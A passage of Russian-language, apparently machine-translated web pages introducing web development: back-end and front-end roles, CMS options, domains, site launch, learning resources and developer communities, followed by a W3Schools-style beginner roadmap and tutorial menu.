- Серверы , которые представляют собой аппаратное и программное обеспечение, из которых состоит ваш компьютер. Серверы отвечают за отправку, обработку и получение запросов данных. Они являются посредником между базой данных и клиентом/браузером. Браузер, по сути, скажет серверу: «Мне нужна эта информация», и сервер будет знать, как получить эту информацию из базы данных и отправить ее клиенту.
Вместе эти компоненты составляют основу каждого веб-сайта.
Что касается создания вашего веб-сайта, бэкэнд-разработчики установят три вещи.
- Ваш логический код , который представляет собой набор правил того, как ваш сайт будет реагировать на определенные запросы и как будут взаимодействовать объекты вашего сайта.
- Ваше управление базой данных , как ваш веб-сайт будет организовывать, управлять и извлекать свои данные.
- Ваша инфраструктура, в которой будет размещаться ваш сайт. Размещение собственного сайта даст вам больший контроль, но это намного дороже и требует от вас поддержания работоспособности и безопасности вашего собственного сервера.
С этими компонентами и решениями ваш веб-сайт будет готов к разработке внешнего интерфейса.
Примечание : Серверная часть немного имеет отношение к веб-разработке, потому что вам не всегда нужна внутренняя часть, если вы не храните какие-либо данные. «Данные» в этом контексте означают любую введенную пользователем информацию, которую вам необходимо сохранить и сохранить. Подумайте о входе на веб-сайт. Если у них нет серверной части, как они могут запомнить вашу регистрационную информацию? Или какие у вас настройки профиля? Чтобы получить эту информацию, вам нужен сервер.
Facebook, например, необходимо знать, какие люди есть в вашем списке друзей, к каким мероприятиям вы присоединились, какие публикации создали и т. д. Это все «данные», которые хранятся в базе данных. Если бы у них не было серверной части с базой данных, ни одна из этих данных не была бы им доступна.
С другой стороны, веб-сайт, который является чисто информационным и не требует от пользователей ввода каких-либо данных, не нуждается в серверной части.
Итак, если у вас нет данных, вам не обязательно нужна внутренняя разработка. Но это не значит, что вы не должны изучать основы. Вы никогда не знаете, когда вам это может понадобиться.
5.
Создайте интерфейс своего веб-сайта.
Если вы когда-либо пробовали себя в веб-дизайне или разрабатывали веб-сайты на WordPress, Squarespace или Google Sites, вы касались веб-разработки переднего плана.
Внешний интерфейс очень важен — это то, что видят ваши посетители, клиенты и пользователи и как они будут использовать ваш сайт.
Front-end (или клиентская) разработка включает комбинацию JavaScript, HTML и CSS. Он также управляет такими компонентами, как типографика и шрифты, навигация, позиционирование, совместимость и скорость отклика браузера. Эта часть будет отражать ваше первоначальное видение сайта и то, что вы включили в свой макет.
По мере изменения технологий и потребительских предпочтений клиентское кодирование устаревает гораздо быстрее, чем серверная разработка. Здесь пригодятся ресурсы по кодированию (например, те, которые мы включили ниже).
6. (Необязательно) Работа с CMS.
Зачем кому-то выбирать CMS, а не программировать «вручную» или «с нуля»? Это правда, что CMS менее гибкая и, следовательно, дает вам меньше контроля над интерфейсом. Однако CMS проще в использовании (вам нужно писать меньше кода), и в ней часто есть инструменты для размещения сайта, хранения информации о пользователях, создания блога, публикации целевых страниц, сбора лидов и даже создания списка адресов электронной почты. В результате вы сможете сделать свой сайт более прибыльным, выполнив менее половины работы.
Узнайте, почему тысячи клиентов используют CMS HubSpot для создания оптимизированного веб-сайта, который интегрируется с данными HubSpot CRM и полным маркетинговым набором.
Опции CMS часто включают плагины, которые избавляют от необходимости писать серверную часть. Например, существуют плагины WordPress для электронной коммерции, так что вместо создания сложной серверной части для оплаты кредитных карт клиентов вы можете просто использовать существующий плагин и избежать необходимости иметь дело с базами данных и кодом на стороне сервера.
Популярные системы управления контентом включают HubSpot, Joomla, Magento и WordPress, доля рынка которых превышает 65%. (В данном случае мы говорим о программном обеспечении WordPress с открытым исходным кодом, а не о конструкторе сайтов WordPress.)
7. Приобретите доменное имя.
На этом этапе ваш сайт будет иметь IP-адрес. Ему также необходимо доменное имя, запоминающееся имя веб-сайта, по которому ваши посетители смогут найти ваш сайт.
Возможно, вы слышали о таких сайтах, как GoDaddy и Hover. Эти услуги помогут вам приобрести доменное имя и зарегистрироваться в ICANN (Интернет-корпорация по присвоению имен и номеров). Большинство регистраций доменов действительны в течение года, прежде чем вам потребуется продлить их.
Разработчики веб-сайтов и услуги хостинга, такие как WordPress и Squarespace, также позволяют вам приобрести доменное имя.
8. Запустите свой сайт.
После того, как вы настроили доменное имя и связали его с хостом, вы почти готовы представить свою работу в Интернете.
Но не так быстро — есть еще несколько вещей, которые вам нужно проверить перед официальным запуском. К ним относятся планирование обязанностей в вашей команде, тщательное тестирование вашего сайта на наличие сбоев, оптимизация для SEO и окончательная проверка перед тем, как «щелкнуть выключателем» и запустить ваш сайт.
Ресурсы для разработки веб-сайтов
Хотите узнать больше о разработке и программировании? Помимо общения и общения с другими разработчиками, существует множество ресурсов, к которым вы можете обратиться, чтобы углубить свое понимание веб-разработки.
Курсы и классы по веб-разработке
Если вы хотите изучить программирование серверной части, интерфейса или полного стека, вот несколько онлайн-курсов и классов, рекомендованных разработчиками HubSpot.
УчебникиПункт
Весь контент и ресурсы на TutorialsPoint бесплатны. Помимо учебных пособий, электронных книг и видео, TutorialsPoint предлагает множество вариантов обучения кодированию.
умник
Согласно их веб-сайту, «умник — это группа работающих профессионалов в области веб-разработки и участников с открытым исходным кодом, которые предоставляют вам краткие, насыщенные информацией видеокурсы по лучшим инструментам в отрасли».
Пользователи могут проходить курсы, слушать подкасты или брать уроки по широкому кругу тем веб-разработки.
Академия Хана
Академия Хана — известный бесплатный образовательный ресурс. Пользователи могут изучать что угодно, от макроэкономики до линейной алгебры и истории США, а также несколько компьютерных тем.
SiteSaga
SiteSaga — это бесплатный онлайн-ресурс для обучения созданию веб-сайтов для начинающих. Это исчерпывающая сага о веб-сайтах, в которой представлены простые и исчерпывающие руководства по созданию веб-сайтов, их расширению и обеспечению заметного присутствия в Интернете. В основном ориентированный на не-разработчиков и малый бизнес, он предлагает самые простые способы создания веб-сайтов с использованием CMS, таких как HubSpot и конструкторов веб-сайтов.
freeCodeCamp
freeCodeCamp — это некоммерческая организация (например, Khan Academy), которая помогает людям научиться программировать бесплатно. Тысячи статей, видеороликов и интерактивных уроков, а также учебные группы по всему миру, freeCodeCamp помогает тысячам разработчиков и инженеров узнать о программировании и работе по землеустройству.
Team Treehouse
Team Treehouse — это программа онлайн-обучения на основе подписки. Пользователи вносят ежемесячную плату и получают доступ к сотням курсов по более чем 20 различным темам. От JavaScript до Python и PHP, Treehouse может научить вас всему, что вам нужно знать о веб-разработке.
Сообщества веб-разработчиков
Веб-разработчики — мастера Интернета, поэтому вполне логично, что они общаются и общаются в интернет-сообществах.
Согласно Code Condo, разработчики присоединяются к этим сообществам для:
- Актуальной информации и решения проблем
- Проницательные ответы, новые перспективы
- Советы и рекомендации для программистов всех уровней
- Ссылки на ресурсы, доклады и исследовательские работы
- Встреча с новыми друзьями, приятелями по коду и потенциальными партнерами
Вот несколько интернет-сообществ, рекомендованных нашими разработчиками HubSpot.
Stack Overflow
Stack Overflow появился почти 15 лет назад и с тех пор стал одним из самых популярных сообществ программистов в мире. По словам соучредителя Джеффа Этвуда, «[Stack Overflow] создан программистами для программистов с конечной целью коллективного увеличения общей суммы хороших знаний в области программирования в мире».
Stack Overflow — отличное место, где можно задать вопросы, потому что большую часть времени другие разработчики задавали одни и те же вопросы и отвечали на них. Форумы в Stack Overflow позволяют вам общаться с другими разработчиками, а также держать вас в курсе.
Mozilla Development Network
Mozilla Development Network (MDN), как известно, является более подробным и точным, чем другие онлайн-ресурсы. Это не столько сообщество, сколько исчерпывающий ресурс и библиотека документов по языкам программирования. MDN полезен, когда вы изучаете, как работают определенные функции, и следите за последними новостями в области кодирования и разработки.
Reddit — это форум, где разработчики всех уровней собираются, чтобы задавать вопросы и отвечать на них. Он невероятно интерактивен и включает людей со всего мира. Вы также можете присоединиться к «субреддитам» по конкретным темам, таким как веб-дизайн, JavaScript или фриланс.
Погрузитесь в веб-разработку
Интернет никуда не денется, и он постоянно развивается, чтобы удовлетворить потребности пользователей. Веб-разработчики находятся на переднем крае этих инноваций и улучшений — от этого блога до вашей любимой социальной сети и приложений, которые вы используете на своем телефоне, веб-разработка повсюду.
В результате стоит потратить время на понимание кодирования и программирования, чтобы помочь сделать ваш корпоративный веб-сайт как можно лучше — для вас и ваших клиентов.
Примечание редактора. Этот пост был первоначально опубликован в ноябре 2018 года и обновлен для полноты.
Веб-разработка
❮ Главная
Следующий ❯
Чтобы стать веб-разработчиком, начните с предметов ниже,
в следующем порядке:
HTML
1.
Создайте свою первую веб-страницу
Первое, что вам нужно выучить, это HTML, который является стандартным языком разметки для создания веб-страниц.
Изучите HTML
CSS
2. Придайте стиль своей веб-странице
Следующим шагом будет изучение CSS, чтобы установить макет вашей веб-страницы с красивыми цветами, шрифтами и многим другим.
Изучите CSS
JavaScript
JavaScript
3. Сделайте вашу веб-страницу интерактивной
После изучения HTML и CSS вы должны изучить JavaScript, чтобы создавать динамические и интерактивные веб-страницы для своих пользователей.
Изучение JavaScript
Что дальше?
Теперь вы знаете, как использовать HTML, CSS и JavaScript
для создания, оформления и создания интерактивных веб-страниц.
Следующим шагом является публикация вашего веб-сайта,
чтобы весь остальной мир мог увидеть вашу работу.
Существует множество хостинговых услуг на выбор.
Мы сделали один для вас бесплатно:
W3Schools Spaces
Создайте свой собственный веб-сайт с помощью W3Schools Spaces.
Начните бесплатно
Здравствуйте,
Front-End Developer!
Людей, которые зарабатывают на жизнь созданием веб-сайтов и веб-приложений, называют
Front-End Developers .
Совет: Многие разработчики интерфейсов также обладают базовыми знаниями о различных средах и библиотеках CSS и JavaScript, таких как Bootstrap, SASS (препроцессор CSS), jQuery и React,
и популярной системе контроля версий Git.
Что насчет серверной части?
Front-end разработка относится к клиентской стороне (как веб-страница выглядит ).
Back-end разработка относится к стороне сервера (как работает веб-страница ).
Код внешнего интерфейса
используется для создания
статических веб-сайтов , целью которых является отображение веб-страницы. Однако, если вы хотите сделать свой сайт динамическим (управлять файлами и базами данных,
добавлять контактные формы, управлять доступом пользователей и т. д.), вам необходимо изучить язык программирования для серверной части, такой как PHP или Python, и использовать SQL для связи с базами данных.
Список других популярных языков можно найти на нашей домашней странице.
❮ Главная
Следующий ❯
ВЫБОР ЦВЕТА
Лучшие учебники
Учебное пособие по HTML
Учебное пособие по CSS
Учебное пособие по JavaScript
Учебное пособие
Учебное пособие по SQL
Учебное пособие по Python
Учебное пособие по W3.CSS
Учебное пособие по Bootstrap
Учебное пособие по PHP
Учебное пособие по Java
Учебное пособие по C++
Учебное пособие по jQuery
9000 5
Лучшие ссылки
HTML Reference
CSS Reference
JavaScript Reference
SQL Reference
Python Reference
W3.